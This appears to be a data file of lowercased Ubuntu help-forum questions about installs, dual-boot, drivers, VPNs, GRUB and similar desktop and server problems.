411566	ubuntu server 12.04 + webmin , add hard drives to raid 6	the subject may already discussed , if this is the case , a reference would be much appreciated because i really searched and never found real answers to my questions . i have a ubuntu 12.04 lts server installation , i manage 50 % with webmin and the rest from the command line . i have a few hard drives in raid 6 . i would like to grow the cluster by adding 5 other hard drives without losing my data . is this possible ? and if so , is it possible to handle all via webmin ? thank you
411569	upgrade pgadmin3 1.16 to 1.18	i 'm running ubuntu 13.04 and have pgadmin3 1.16 installed . i downloaded pgadmin3-1.18.1.tar.gz from http : //www.postgresql.org/ftp/pgadmin3/release/v1.18.1/src/ i followed all the instructions found in the install file and make install seemed to work well . the problem is that when i try to run pgadmin3 , it still opens 1.16 . i tried uninstalling 1.16 and then reinstalling 1.18 , but then i ca n't even find the executable . my guess is that 1.18 is installed , how/where can i find it ? or if not , how do i upgrade 1.16 to 1.18 thanks ! edit the commands i ran are : taken from how can i update pgadmin3 to v1.14 ? and http : //linuxrails.blogspot.co.il/2012/09/install-pgadmin-for-postgresql-92-on.html sudo apt-get remove pgadmin3 sudo apt-add-repository ppa : voronov84/andreyv sudo apt-get update sudo apt-get install pgadmin3 from pgadmin3-1.18.1/install sudo apt-get remove pgadmin3 tar xvfz pgadmin3-1.18.1.tar.gz cd pgadmin3-1.18.1 ./configure make all sudo make install
411576	can i disable the hibernation alert ?	my laptop goes into hibernation when i 'm away for more than 30 minutes . that 's good , but it also pops up an alert right before and that is silly , especially since the screen goes dark after 30 idles seconds and suspends after 2 idle minutes ( per brightness & lock settings ) so basically whenever i come back to my suspended machine i 've got an alert waiting for me . how do i disable the alert ? i do n't see anything in my power or brightness & lock settings about the alert .
411577	how to debug and fix a pptp vpn client connection	i have just installed ubuntu 13.10 and i 'm trying to set up a vpn client . i have configured it with the same settings i use on a mac and i am able to connect from that without any problem . when i click on the vpn connections i see two messages pop up , one after the other . 1 ) vpn connection has been successfully established 2 ) the vpn connection failed . i 've searched around for a solution without any luck . i 'm not experienced in these matters at all . i 've provided the log in the hope that it helps . networkmanager [ 2650 ] : < info > starting vpn service 'pptp ' ... networkmanager [ 2650 ] : < info > vpn service 'pptp ' started ( org.freedesktop.networkmanager.pptp ) , pid 3052 networkmanager [ 2650 ] : < info > vpn service 'pptp ' appeared ; activating connections networkmanager [ 2650 ] : < info > vpn plugin state changed : init ( 1 ) networkmanager [ 2650 ] : < info > vpn plugin state changed : starting ( 3 ) networkmanager [ 2650 ] : < info > vpn connection 'bioxydyn ' ( connect ) reply received . pppd [ 3056 ] : plugin /usr/lib/pppd/2.4.5/nm-pptp-pppd-plugin.so loaded . pppd [ 3056 ] : pppd 2.4.5 started by root , uid 0 pppd [ 3056 ] : using interface ppp0 pppd [ 3056 ] : connect : ppp0 < -- > /dev/pts/1 networkmanager [ 2650 ] : scplugin-ifupdown : devices added ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) networkmanager [ 2650 ] : scplugin-ifupdown : device added ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) : no ifupdown configuration found . networkmanager [ 2650 ] : < warn > /sys/devices/virtual/net/ppp0 : could n't determine device driver ; ignoring ... pptp [ 3060 ] : nm-pptp-service-3052 log [ main : pptp.c:314 ] : the synchronous pptp option is not activated whoopsie [ 996 ] : online pptp [ 3074 ] : nm-pptp-service-3052 log [ ctrlp_rep : pptp_ctrl.c:251 ] : sent control packet type is 1 'start-control-connection-request' pptp [ 3074 ] : nm-pptp-service-3052 log [ ctrlp_disp : pptp_ctrl.c:739 ] : received start control connection reply pptp [ 3074 ] : nm-pptp-service-3052 log [ ctrlp_disp : pptp_ctrl.c:773 ] : client connection established . whoopsie [ 996 ] : online pptp [ 3074 ] : nm-pptp-service-3052 log [ ctrlp_rep : pptp_ctrl.c:251 ] : sent control packet type is 7 'outgoing-call-request' pptp [ 3074 ] : nm-pptp-service-3052 log [ ctrlp_disp : pptp_ctrl.c:858 ] : received outgoing call reply . pptp [ 3074 ] : nm-pptp-service-3052 log [ ctrlp_disp : pptp_ctrl.c:897 ] : outgoing call established ( call id 0 , peer 's call id 10009 ) . whoopsie [ 996 ] : online pppd [ 3056 ] : chap authentication succeeded pppd [ 3056 ] : lcp terminated by peer pptp [ 3074 ] : nm-pptp-service-3052 log [ ctrlp_disp : pptp_ctrl.c:929 ] : call disconnect notification received ( call id 10009 ) whoopsie [ 996 ] : online whoopsie [ 996 ] : online pppd [ 3056 ] : connection terminated . avahi-daemon [ 630 ] : withdrawing workstation service for ppp0 . networkmanager [ 2650 ] : < warn > vpn plugin failed : 1 networkmanager [ 2650 ] : scplugin-ifupdown : devices removed ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) pppd [ 3056 ] : modem hangup pptp [ 3060 ] : nm-pptp-service-3052 warn [ decaps_hdlc : pptp_gre.c:204 ] : short read ( -1 ) : input/output error pptp [ 3060 ] : nm-pptp-service-3052 warn [ decaps_hdlc : pptp_gre.c:216 ] : pppd may have shutdown , see pppd log networkmanager [ 2650 ] : < warn > vpn plugin failed : 1 pppd [ 3056 ] : exit . pptp [ 3074 ] : nm-pptp-service-3052 log [ callmgr_main : pptp_callmgr.c:234 ] : closing connection ( unhandled ) pptp [ 3074 ] : nm-pptp-service-3052 log [ ctrlp_rep : pptp_ctrl.c:251 ] : sent control packet type is 12 'call-clear-request' pptp [ 3074 ] : nm-pptp-service-3052 log [ call_callback : pptp_callmgr.c:79 ] : closing connection ( call state ) networkmanager [ 2650 ] : < warn > vpn plugin failed : 1 networkmanager [ 2650 ] : < info > vpn plugin state changed : stopped ( 6 ) networkmanager [ 2650 ] : < info > vpn plugin state change reason : 0 networkmanager [ 2650 ] : < info > policy set 'virginmedia2204860 ' ( wlan0 ) as default for ipv4 routing and dns . networkmanager [ 2650 ] : < warn > error disconnecting vpn : could not process the request because no vpn connection was active . networkmanager [ 2650 ] : < info > vpn service 'pptp ' disappeared
411578	windows 8.1 dual boot with ubuntu doesnt find windows 8.1 partion	i recently tried to install ubuntu 12.04 lts x64 on my pc . when i get to step of the installation process where i should be able to choose the installation type , the dual boot option is not there and it says that there 're no operative systems installed when i really have windows 8.1 x64 . can anyone please help me fix this problem . thanks in advance .
411580	tf2 server problems	this is the first tf2 server i have attempted to make , so i can not really describe the problem.what i can do , is show you the fail report . ./steamcmd.sh : line 11 : ulimit : open files : can not modify limit : operation not permitted redirecting stderr to '/home/trevin/steam/logs/stderr.txt' [ 0 % ] checking for available updates ... [ -- -- ] verifying installation ... steam console client ( c ) valve corporation -- type 'quit ' to exit -- loading steam3 ... /home/buildbot/buildslave_steam/steam_rel_client_linux/build/src/steamconsole/../common/steam/client_api.cpp ( 300 ) : assertion failed : clientapi_initglobalinstance : internalapi_init_internal failed , most likely because you are missing a 32-bit dependency of steamclient.so ( the steam client is a 32-bit app ) . failed . thank you for helping !
411582	updated windows 8 , tried to fix with boot repair and ca n't pass gnu grub screen	i 'm having a hard time now with my laptop . i have an asus x501 with windows8 preloaded and i decided to install ubuntu studio last year . everything was great , i was able to choose to boot into ubuntu or windows when i turned on the computer . you know how windows is , so my brother used the laptop the other day and `` accidentally '' updated some components of windows , which screwed the boot menu and always booted directly into windows . i had no way to run ubuntu , so i searched for help and i found that i needed to run ubuntu through a live usb ( my laptop does n't come with dvd unit ) and then inside ubuntu i should run boot repair . i downloaded the iso and created the usb live stick , managed to boot into it , ran boot-repair through terminal and followed the recommended option to repair it . it said it was ready and i should reboot the computer . so i did but i got into this screen . gnu grub version 2.00-19ubuntu2.1 minimal bash-like line editing is supported . for the first word , tab lists possible command completions . anywhere else tab lists possible device or file completions grub > and now i cant get past it . i ca n't boot into windows , i ca n't boot ubuntu , i cant boot live usb.. i 've been trying to make some changes on the bios to choose the boot properties , disabling and enabling options but nothing helps . after i ran boot-repair , i got a message of the log of the repair process , and this is it : http : //paste.ubuntu.com/6823916/ thanks for your help update ok , now i 'm able to boot the live usb stick . it seems that the memory on the usb 3.0 was not being recognized , i put it on other normal usb port and worked . it seems to me it has to do with some uefi things . since this is the only thing that can boot , the other options windows bootloader and ubuntustudio does n't say anything about `` uefi '' at the boot menu , only the usb stick.. i have ran again boot-repair and played around on the advanced options enabling and disabling options but nothing changes.. for me , it has to do with something that windows and ubunu partitions need to be set up as uefi , and they currently are not.. no matter which option i select it will take me back to the grub gnu screen , unless i select uefi kingston which is the live usb.. thanks
411583	could not stat the resume device file	i 've copied one disk content to another disk and now when system boots i get this : resume : libgcrypt version : 1.5.0 resume : could not stat the resume device file '/dev/sda6 ' please type in full path name to try again or press enter to boot the system the problem is now i do n't have /dev/sda6 . i removed this row from fstab , restarted system but i still get this message .
411585	3d slicer installation fails ? it does not run as if it does not exist	i installed ubuntu 12 through windows installer . i tried to install 3d slicer 4.3.1 software but it does not open , can not be launched . what is going on ? www.slicer.org
411586	unable connect to internet using wifi on ubuntu	i just installed ubuntu 12 on to my dell pc running windows 7 . and the wifi does n't seem to work . can anyone tell me if i need to install anything such as drivers ... etc . f.y.i ; i do not have cd 's to burn software . so if there 's a way around that it would be nice . i 'm using a cisco router
411588	how to tail a log file when removing lines ( not appending ) of the file ?	i want to know how to tail a log file when lines in the files are updating ( appending and removing ) ?
411591	remap caps_lock to esc and control without x11	i want to remap my caps_lock key to be esc when pressed by itself , or ctrl when pressed with another key . here 's the twist : i want to do it without x11 . i found this answer which says `` write a simple udev rule '' but i do n't know how to do that . on my other computer i was using xcape which is the functionality i want , but unfortunately xcape requires x11 ( which i do n't want ) . i also found this which might be helpful but i 'm too much of a newb to figure it out . edit this question over at unix & linux is basically identical but has no answer after 7 months .
411600	unable to open ubuntu software center	i have got ubuntu 13.10 to my old laptop . i wanted to look for apps and stuff in software center . so i opened it & it opens slowly and then just closed soon after . i do not see any reason nor an error.. just closing suddenly . what could be the problem ?
411602	bootable usb for macbook , bs numerical error	been trying a few ways to create a bootable live usb thumb drive , all ok until final step . i get this error `` dd : bs : illegal numeric value '' i tried adding an upper case `` m '' as directed , this made no difference . these are the directions i was following . thanks how to install ubuntu on macbook using usb stick
411604	applications menu does not find installed eclipse	i just switched from my company 's version of eclipse to the stock ubuntu version . however , when i did : sudo apt-get remove eclipse i found that my company 's eclipse remained installed . i figured it was installed outside the package repo , so i tried : which eclipse which returned /usr/bin/eclipse so i rm-ed it . the shortcut to eclipse remained in my applications menu , but returns a 'failed to launch application ' error . then i tried sudo apt-get install eclipse which returned success , but which eclipse does not return anything , and attempting to launch eclipse gives the same 'failed to launch application ' error as when there was no eclipse installed . how do i get the ui/package manager to agree on whether/where eclipse is installed ? failing that , how do i figure out what the applications menu is trying to launch , and how do i figure out what the package manager has installed ? edit : more output was requested : locate eclipse | grep bin/ gives /other/eclipse/plugins/org.apache.ant_1.8.3.v201301120609/bin/ant /other/eclipse/plugins/org.apache.ant_1.8.3.v201301120609/bin/ant.bat /other/eclipse/plugins/org.apache.ant_1.8.3.v201301120609/bin/ant.cmd /other/eclipse/plugins/org.apache.ant_1.8.3.v201301120609/bin/antrun /other/eclipse/plugins/org.apache.ant_1.8.3.v201301120609/bin/antrun.bat /other/eclipse/plugins/org.apache.ant_1.8.3.v201301120609/bin/antrun.pl /other/eclipse/plugins/org.apache.ant_1.8.3.v201301120609/bin/antenv.cmd /other/eclipse/plugins/org.apache.ant_1.8.3.v201301120609/bin/complete-ant-cmd.pl /other/eclipse/plugins/org.apache.ant_1.8.3.v201301120609/bin/envset.cmd /other/eclipse/plugins/org.apache.ant_1.8.3.v201301120609/bin/lcp.bat /other/eclipse/plugins/org.apache.ant_1.8.3.v201301120609/bin/runant.pl /other/eclipse/plugins/org.apache.ant_1.8.3.v201301120609/bin/runant.py /other/eclipse/plugins/org.apache.ant_1.8.3.v201301120609/bin/runrc.cmd /usr/bin/eclipse /usr/lib/eclipse/plugins/org.apache.ant_1.8.2.v20120109-1030/bin/ant /usr/lib/eclipse/plugins/org.apache.ant_1.8.2.v20120109-1030/bin/ant.cmd /usr/lib/eclipse/plugins/org.apache.ant_1.8.2.v20120109-1030/bin/antrun /usr/lib/eclipse/plugins/org.apache.ant_1.8.2.v20120109-1030/bin/antrun.pl /usr/lib/eclipse/plugins/org.apache.ant_1.8.2.v20120109-1030/bin/antenv.cmd /usr/lib/eclipse/plugins/org.apache.ant_1.8.2.v20120109-1030/bin/complete-ant-cmd.pl /usr/lib/eclipse/plugins/org.apache.ant_1.8.2.v20120109-1030/bin/envset.cmd /usr/lib/eclipse/plugins/org.apache.ant_1.8.2.v20120109-1030/bin/runant.pl /usr/lib/eclipse/plugins/org.apache.ant_1.8.2.v20120109-1030/bin/runant.py /usr/lib/eclipse/plugins/org.apache.ant_1.8.2.v20120109-1030/bin/runrc.cmd and find /opt /usr/bin /usr/lib /usr/local/ -iname eclipse -type f gives /usr/lib/eclipse/eclipse and dpkg -s `` bin/eclipse '' gives eclipse-platform : /usr/bin/eclipse thanks for the help !
411605	configure vpn connection in terminal	i 'm trying to setup a vpn connection on a remote box , via ssh , to use my account on ipvanish , this is a guide to configure the connection using the gui , which is not my case because i need to ssh into the box visual guide . could anyone please help me doing this steps using only the terminal . pptp guides only include installation and some useless information for my case pptp much appreciation
411607	auto-mounting fails in ubuntu when connecting a removable device	sometimes auto mount fails to process while i insert sd-card reader or a usb drive on my desktop ( ubuntu 12.04 ) . when i restarts my desktop it works fine . it happens very often but i need solution to mount those drives without having to restart my system .
411609	booting ubuntu 13.10 from external hard disk on both uefi and bios ?	external hard disk details , gpt , 150gb partition of ubuntu 13.10 . ubuntu newbie here please be kind . firstly , what i would like to do is that ubuntu is able to boot in uefi computers as well as old bios based computers . i know that uefi has a protective mbr and that can be used to make ubuntu boot on old computers . but i do not know how to get that configuration . secondly , i tried booting on a windows 8 computer , have set secure boot off , have made external disk a priority and have ubuntu installed in a partition still ubuntu does not boot on startup . what configuration do i need to achieve this ? thanks a lot . is it even possible ?
411611	system settings does n't display graphic drivers in ubuntu 13.04	i recently installed ubuntu 13.04 on an asus k55vd ci3 with a 4gb ram , 500gb hdd and a 2gb nvida geforce610m graphics card . i followed all the steps given on bumblebee wiki . yet i am unable to see my graphics card in system settings/properties . can anyone help ?
411615	hyphenation fails in libre office 3.5	`` executing the hyphenation . : english ( uk ) is not supported by the spell-check function or is not presently active . please check your installation and , if necessary , install the required language module or activate it under 'tools-options-language settings-writing aids ' . but it is installed and activated and it is checking my spelling in english english ( en-gb ) . it just wo n't hyphenate . a document that wo n't hyphenate is not of publishable quality . 28/01/2014 just ran sudo apt-get install myspell-en-gb which informed me that no files needed changing and none were updated i.e . it is installed in the latest version . same result for libreoffice -l10n -en-gb
411616	what does keywords in my /etc/network/interfaces means ?	my etc/network/interfaces file contain : auto eth0 iface eth0 inet dhcp what is the meaning of auto , iface , inet
411618	usb dac in 13.04 does not appear in settings or lsusb	i 'm using a schiit audio modi usb dac on 13.04 . i had it working in the past , it occasionally did not show up in settings > sound . this was always fixed by uninstalling and reinstalling alsa-utils . the last time i tried to do that , my computer froze and i was forced to hard reboot . after this , reinstalling alsa-utils did not fix the issue . my dac does not show up if i use lsusb , it returns the following . bus 001 device 002 : id 0424:2514 standard microsystems corp. usb 2.0 hub bus 002 device 002 : id 046d : c52b logitech , inc. unifying receiver bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub another thread suggested posting the output of dmesg | tail [ 595.499347 ] usb 1-4 : product : schiit usb audio device [ 595.499353 ] usb 1-4 : manufacturer : schiit [ 595.530201 ] usbhid 1-4:1.2 : ca n't add hid device : -71 [ 595.530223 ] usbhid : probe of 1-4:1.2 failed with error -71 [ 595.530325 ] usb 1-4 : usb disconnect , device number 34 [ 595.768069 ] usb 1-4 : new high-speed usb device number 35 using ehci-pci [ 595.907322 ] usb 1-4 : new usb device found , idvendor=0d8c , idproduct=1319 [ 595.907330 ] usb 1-4 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 595.907336 ] usb 1-4 : product : schiit usb audio device [ 595.907341 ] usb 1-4 : manufacturer : schiit any ideas on how to resolve this ?
411619	what is the grub customizer app and how is it used to handle different operating systems ?	i do not understand what exactly grub customizer is . i have heard about it in the context of managing different operating systems . can somebody kindly explain to me how it is used along with the appropriate instructions for it ?
411621	recovering quick formated external hard disk	i accidentally formatted my 1tb external hard disk with quick format mode . before it was ntfs and now it is formatted as fat32 . i tried testdisk but it says `` filesystem seems damaged '' . i tried photorec and it recovered my data ( but they are uncategorized and unnamed ) . is there any solution to recover my data with their original names and folders ?
411623	take control of process via ssh	i 've started a process via ssh that it seems will take 2-3 days . i 've not started this via tmux , so if my connection dies , my task will need to start over . is there anyway i can login to another ssh session and take control of this process in a tmux session , close the original ssh session and have the process continue to run ?
411624	adding an icon to a guest account when the icon is on main account	how do i add an icon to a guest account when the icon is available on main account ?
411625	how do i install ia32-libs in 13.10 ?	why on earth did canonical discontinue ia32-libs ? the android sdk requires them ! i spent about an hour trying to figure out what the issue was and then i realized that i needed ia32 , but i ca n't install it . can anyone help me wih this ?
411629	how do i install serviio 1.4 on ubuntu 12.04 ?	i have created a new user : serviio on ubuntu 12.04 and i have downloaded the serviio package . http : //serviio.org/download i would like to connect my music , pictures and movies from my pc to my sony bravia using the renderer system . i have found some installation tips but only for serviio 1.0 or serviio 1.1 . i 'm looking for recent tips and scripts and clear how to change the files and add the scripts ( because i 'm a newbie ) . do i need to install other programs like mediatomb ? ? ? thanks for reading .
411632	hybrid graphics : change igpu driver options when using fglrx ?	normally when wanting to change the intel driver options xorg.conf can just be edited like : section `` device '' identifier `` intel graphics '' driver `` intel '' option `` accelmethod '' `` uxa '' endsection for example to choose the acceleration method . how is this achieved when using fglrx drivers on a hybrid graphics system ( with intel and amd cards ) and an xorg.conf , by default ( aticonfig -- initial generated ) looks like section `` serverlayout '' identifier `` my layout '' screen 0 `` aticonfig-screen [ 0 ] -0 '' 0 0 endsection section `` monitor '' identifier `` aticonfig-monitor [ 0 ] -0 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' endsection section `` device '' identifier `` aticonfig-device [ 0 ] -0 '' driver `` fglrx '' busid `` pci:6:0:0 '' endsection section `` screen '' identifier `` aticonfig-screen [ 0 ] -0 '' device `` aticonfig-device [ 0 ] -0 '' monitor `` aticonfig-monitor [ 0 ] -0 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 endsubsection endsection ( i tried adding an intel device stanza with desired options ; it leads to a segfault )
411633	trackpad stopped responding	i have a hp probook and i am using linux ubuntu 12.04 . it has a 64 bit os . my problem is that the trackpad has stopped working in my master account whereas it is working in the guest account after the time it got hung up and i had to re start it . i do n't understand why . plz help i have tried backup from my guest account and tried to use mouse keys but did n't know what i was doing so nothing worked out .
411634	how to install windows 7 alongside ubuntu ?	i have installed ubuntu 13.10 . now i want to have windows 7 . please let me know the procedures . my sony-vaio laptop has 4gb ram , i3 processor .
411636	hardware compatibility of my system	i am planning to switch from windows 8.1 to ubuntu soon ( maybe in april when 14.04 is out ) . i already installed ubuntu 13.04 on my pc , but got the feeling it does n't run smoothly . i got to admit i have no idea of linux at all ... so i did n't even manage to install the latest nvidia driver lol but that 's just a matter of practice and changing habits - so np the other thing is my hardware - i just recently bought some new decend hardware for my rig and did n't pay attention on linux/ubuntu compatibility . can anyone tell me , if it is even possible to run ubuntu smoothly on my pc ? msi h87-g43 ( mainboard ) intel xeon e3 1230v3 ( cpu ) nvidia gtx570 ( gpu from msi ) ( is there an afterburner version for linux ? ) 8gb corsair cml8gx3m2a1600c9 ( ram - 2x4gb ) kingston skc300s37a240g ( ssd ) 2 other hdds asus xonar essence stx ( soundcard ) wireless xbox 360 controller so , can anyone tell me if there might be problems regarding my hardware ! ? thanks ps : if i install 13.04 , can i easily update to 14.04 , or do i have to install everything again ?
411637	planing to switch from windows	i want to switch from windows & my use with pc is music movies picture editing ( creating hdr , etc ) and torrent download so i need security and performance . i 'm currently using windows 7 64bit hardware : intel i7 4770 3.4ghz 8gb ram nvidia geforce gtx 650ti boost 2gb and standard performance hdd when i 'm upgrading which are all the drivers , that i will need and which are the drivers available by default ? my net is always on and torrent is always on download : p so i hope i get security .
411638	ca n't login in from lightdm	but just lightdm . it worked this morning , just does not seem to be working this evening . this seems to occurred after a shutdown after a wakeup from hibernation . i always get a password denied sort of thing : i can login into gnome by running this in the tty ( which i can access ) : sudo service lightdm stop sudo service gdm start and kde as well ( when installed ) , and using sudo service kdm start instead of the latter command . xfce also works . to resolve this i have tried : removed ~/.xauthority - to no effect rebooting changed password 5/6 times - may eventually get very annoyed and purge /etc/passwd and restore from backups reinstalled unity and lightdm - no effect purged and reinstalled all desktops and desktop managers reconfigured ligthdm with dpkg-reconfigure - useless as it was done by the above and only sets the default desktop manager . created a different user , that does not work - the same for the 'guest session' purged all recent installs here is `/etc/lightdm/lightdm.conf : [ seatdefaults ] user-session=unity greeter-session=unity-greeter and here is /var/log/lightdm/x-0-greeter.log . this is from the recent login , where i tried to login with the user test , and then my default login , wmobbs . if anything more relevant to user/lightdm settings is available , ask and i 'll post it . nothing appears to be a problem in .xsession-errors . yes , there are previous questions like this and this , but those did not help in anyway . all to no effect : - ( using ubuntu 13.10 , intel i5 lenovo g570 ( integrated graphics , with radeon hd 6370m discrete graphics - but i do n't think this is the problem ) laptop . i can still use the machine , i only really use it for work and stuff . i hope to solve this myself , but this will be useful if anyone can think of any ideas .
411644	installing ubuntu replacing windows 8.1 on hp with uefi	product : hp pavillion 15-n206tx pre-loaded os : windows 8.1 i am seeking to replace windows 8.1 ( no dual-boot ) after backing up my licensed version of windows 8.1 . i have recovery partition but i wonder how it works and does it re-install product with genuine product key ? i have been provided no installation media along with netbook . also what are hitches coming along way of installing linux and if there is some tried and tested method for hp ? also , i tried and disabling secure boot is possible .
411649	configure software center for local install	i 'm aware of this post but what i would like is to configure the software center to install software in ~/local/ for example , not to modify the system 's policy about who 's allowed to install packages ... is it possible ? ( on lts 12.04 )
411652	postgresql , how do i connect to it using pgadmin ?	i did the following : sudo juju bootstrap juju deploy postgresql juju expose postgresql juju status environment : local machines : '' 0 '' : agent-state : started agent-version : 1.16.5.1 dns-name : 10.0.3.1 instance-id : localhost series : precise `` 1 '' : agent-state : started agent-version : 1.16.5.1 instance-id : ariskk-local-machine-1 instance-state : missing series : precise services : postgresql : charm : cs : precise/postgresql-59 exposed : true relations : replication : - postgresql units : postgresql/0 : agent-state : started agent-version : 1.16.5.1 machine : `` 1 '' open-ports : - 5432/tcp public-address : 10.0.3.148 how do i connect to this instance ( set password ? )
411653	cisco finnesse 9.1 on mozilla	we would like to know if any linux based application would work ubuntu desktop . i have cisco finnesse 9.1 application which i need accessed through mozilla browser installed on ubuntu desktop . do i need to consider any specific dependencies
411654	how to create a `` .desktop '' file ?	i am running ubuntu 12.04 lts . i have downloaded several programs ( eclipse , sublime text editor , smartgit ) and they all come in zip format . once i uncompress them i can use them , but i can not access them via the dash home menu , like i explain in this thread : how do i install 3rd party programs and make them appear in the dash home menu ? in that thread the answer was in creating a xxx.desktop file , populate it with random fields , and then move that file to a specific folder . i now want to do the same for my eclipe and smartgit programs ( as well as to any other programs i may end up using ) so now i believe i need to learn how to create an xxx.desktop file with the correct fields and the correct instructions . where can i find the information to do that ?
411655	problem installing ubuntu on asus x55u	hai i am unable to install ubuntu 13 , or as a matter of fact any version of ubuntu on my asus x55u , the installation hangs once i select the drives for partitioning . i was installing it from a pen drive . there is nothing wrong with the set up because it works fine on other computers . i was trying to install it along with windows 7 for dual boot . any one else who owns an asus x55u and has successfully installed ubuntu ? ? ? i tried using ubuntu on vware , but even then it does n't work . it hangs for no particular reason .
411656	used iptables to disable internet and now i need to undo it	i used iptables to disable access to the internet on one of my user accounts by following this thread . since i was only doing it for testing i did n't want it to be permanent . further web searching taught me that i should have backed up my iptable rule first , but i did n't do that . i just jumped into the command line without even thinking . i tried searching the web as well as other places in this forum , but only found smarter ways i could have done this . any help would be appreciated . if not , i can manage .
411658	ca n't install ubuntu 12.04.03 32bit from usb boot	i have loaded ubuntu on a usb following the wiki instruction . i can select the usb as a bootable device . after i start it up , the problem appears when i select any of the options to either try ubuntu before install or to install ubuntu on to the hdd . can anyone help with this situation ?
411660	how to install epson xp-750 ?	i am a first time user of ubuntu , and struggle to install a printer , my printer is epson xp-750 a link to how this is done is appreciated .
411662	print screen captures two spaces not one	when i press the `` print screen '' the output captures both desktops instead of one ! this problem existed since i updated to ubuntu 13.10 . update : i opened `` displays '' from `` system settings '' , and found `` built-in display '' and `` unknown display '' .
411663	how to enable log in sound in ubuntu ?	is there a way to enable log in sound in my ubuntu 12.04 . is there a tip to do that ?
411667	always show close , minimize , maxmize buttons	in unity i have to mouse over the top-left to see the close , minimize , and maximize buttons . for some reason , this is really annoying to me . how can i make those buttons always visible ? this does n't do what i want ( it just permanently shows file , edit , ... menus ) . this is closely related , but not the same , and does not have a solution . i 'm using ubuntu desktop 12.04.3 lts .
411670	drop to root shell ( security vulnerability ? )	i 've known about the ability to drop to a root shell for quite a while . you just hold shift and select ( recovery mode ) from the list of kernels presented . i would mess up an install , then drop to root shell and be confused as to how that 's useful when it 's read only and i ca n't actually fix anything . recently i discovered this post from 2012 , showing how you can run : mount -o remount , rw / which will remount root in read-write mode . i was happy that now i can edit things , and fix whatever config file i should n't have changed in whatever ways , but now i 'm root , with access to everything root can access ? pretty cool i thought , unless i 'm somebody who does n't own my computer . i can read all of the password containing files with permissions of root : root 400 . i can modify config files and cause all kinds of mayhem . so the question is , if someone has physical access to my machine , is my system vulnerable to their knowledge of this ? is there something i 'm missing ? is full disk encryption the only way to go ?
411671	12.10 movie player crashed entire system	having intermittent issues using movie player to view video files . most of the time , i can watch the first video fine . but if i then close movie player , and open a second video file from nautilus , my entire system freezes . it freezes so that i ca n't even ctl+alt+f1 to the terminal , and the graphics stay frozen on the screen , instead of dumping a kernel panic message . when this happens , i need to do a hard shutdown of the computer ( hold the power button ) . rarely , but sometimes , i can watch many videos in succession . the issue does not seem to correlate between the type of video file , or whether or not i am mixing and matching between types . how can i fix this issue with movie player ? ( note : for now , i switched to vlc )
411674	error code 141 alongside mac	i installed ubuntu alongside osx , i am not new to osx but i am new to ubuntu and thought it would be cool to learn and use . i used this video to help me out , http : //www.youtube.com/watch ? v=sskpgej -- uy and everything appeared to work properly , however , when i boot my computer it does not recognize the os that i installed , when i put in the usb stick with the ubuntu os on there i can use ubuntu but not install it . any tips or help ?
411680	how do i configure my dns so that it checks a website for my public ip address with ddclient ?	how do i configure my dns so that it checks a website for my public ip address ? i have set up a dyndns hostname that updates the public ip address every hour , so i can connect to that without a problem , but now i need to configure a static internal ip ? ( i ca n't make a static public address because my isp does n't provide it ) . i know /etc/resolv.conf comes into it somewhere , can somebody explain to me how this works ? and i know that my interfaces need to be configured so my network card uses a static internal ip that is linked to the public ip that is always changing ? can someone help me and explain how i can do this , thank you !
411682	can i install multiple ubuntu distros at once ?	i 've been looking at a ubuntu thumb drive of mine , and it has a distros spot on it . can i use it to install multiple distros that i can multiboot to , or is that not possible ? ( i do n't mean variations , i mean releases .
411686	installing ubuntu on a broken macbook ?	i 'm trying to install ubuntu on my broken mac book which is n't booting now ( i had ubuntu on it before and i tried installing arch on it which i think messed up with partitioning ) . so when i switch on the mac , it displays a grey screen with a question mark in a folder at the start-up . then , i took it to the mac store where they said that the hard drive is done , but i thought i can just boot it from a usb , now , i am currently on my windows computer ( windows xp ) and i have a 16gb usb where i used unetbootin to copy ubuntu ( the actual .iso onto the usb ) . but when i plug the usb into my mac it does n't boot and it goes back to the same grayed screen with a question mark in a folder . what can i do to this ?
411690	list containing functions used in c/c++ for ubuntu 's gcc/cc ?	i 'm new to programming . what i want is to know as much about programming as i possibly can , and start off with what people say is a good start : programming with c. i have this pdf called `` teach yourself c in 21 days '' and it looks to be a rather simple introduction to the language . i swapped windows 7 for ubuntu yesterday , after having trouble installing it for over 12 hours ( post i made regarding the issue ) . the main reason why i came to ubuntu is to dive into an os made for people wanting to learn how to develop software or even a new os , like steam 's new os based off linux . the problem i 'm facing , though , is that there seems to be some functions that do n't translate with ubuntu 's terminal ( i followed instructions similar to this post to get started ) . what i 'm asking is whether or not there is some way i can look up corresponding functions used in c programming for gcc ? or is there a pdf or website that teaches c/c++ through gcc ? i will also accept recommendations for where/how/what i should start learning . more info i figure my question can be better answered if i include the actual problem i have . the pdf has this exercise : what does the following program do ? ( enter , compile , and run it . ) 1 : -- /* ex2-5.c */ 2 : -- # include 3 : -- # include 4 : -- main ( ) 5 : -- { 6 : -- char buffer [ 256 ] ; 7 : -- 8 : -- printf ( `` enter your name and press : \n '' ) ; 9 : -- gets ( buffer ) ; 10 : -- 11 : -- printf ( `` \nyour name has % d characters and spaces ! `` , 12 : -- strlen ( buffer ) ) ; 13 : -- 14 : -- return 0 ; 15 : -- } i found out that in order to do some simpler code from earlier exercises , i needed to add 'int ' in front of 'main ' for it to work . so imagine that being added to the code . the error i get when i try to check for the errors is as follows : ex2-5.c : in function ‘main’ : ex2-5.c:9:2 : error : ‘gets’ is deprecated ( declared at /usr/include/stdio.h:638 ) [ -werror=deprecated-declarations ] gets ( buffer ) ; ^ ex2-5.c:12:4 : error : format ‘ % d’ expects argument of type ‘int’ , but argument 2 has type ‘size_t’ [ -werror=format= ] strlen ( buffer ) ) ; ^ cc1 : all warnings being treated as errors
411692	ubuntu 13.10 gives me a black screen , should i use 12.04 instead ?	hello reader i 'm using hp 242 g1 laptop . ubuntu was preinstalled in my laptop but i changed it to windows 7 64 bit . i would like to switch back to ubuntu . which one should i use , ubuntu 12.04.3 or ubuntu 13.10 ? i tried to install ubuntu 13.10 but after installation when i start my laptop the display turns black . is there any sollution for that ?
